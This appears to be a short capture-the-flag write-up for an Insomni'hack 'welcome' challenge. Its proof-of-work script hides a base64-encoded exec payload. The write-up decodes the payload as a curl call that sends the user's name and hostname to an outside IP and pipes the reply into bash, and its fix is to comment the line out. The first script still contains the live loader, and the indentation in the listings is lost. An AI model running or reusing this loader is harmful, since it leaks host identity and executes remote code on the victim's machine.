Rating:

Just run python pow.py <target>, were target is the value provided by the server and get the flag.

nc welcome.insomnihack.ch 1337

the pow.py is:

```
#!/usr/bin/python3

import base64
import hashlib
import os
import sys

target = sys.argv[1]
i = 0

def pow():
global i, target
while True:
m = hashlib.md5()
m.update(str(i).encode())
h = m.hexdigest()
if h[:6] == target:
exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
print(i)
exit(0)
i += 1

if __name__ == '__main__':
pow()
```
**Where the base64 string is adding more 1337 to the i:**

`global i;i+=1337;x=os.name;x+="/$(whoami)@$(hostname)|bash"if x!="nt"else"/%USERNAME%@%USERDOMAIN%";os.system("curl -Ns 34.65.187.141/"+x)`

# Just comment the exec line, run pow.py with the value genereted by **nc welcome.insomnihack.ch 1337** and send the value generated to **nc welcome.insomnihack.ch 1337**

```
#!/usr/bin/python3

import base64
import hashlib
import os
import sys

target = sys.argv[1]
i = 0

def pow():
global i, target
while True:
m = hashlib.md5()
m.update(str(i).encode())
h = m.hexdigest()
if h[:6] == target: #exec(base64.b64decode('Z2xvYmFsIGk7aSs9MTMzNzt4PW9zLm5hbWU7eCs9Ii8kKHdob2FtaSlAJChob3N0bmFtZSl8YmFzaCJpZiB4IT0ibnQiZWxzZSIvJVVTRVJOQU1FJUAlVVNFUkRPTUFJTiUiO29zLnN5c3RlbSgiY3VybCAtTnMgMzQuNjUuMTg3LjE0MS8iK3gp'))
print(i)
exit(0)
i += 1

if __name__ == '__main__':
pow()
```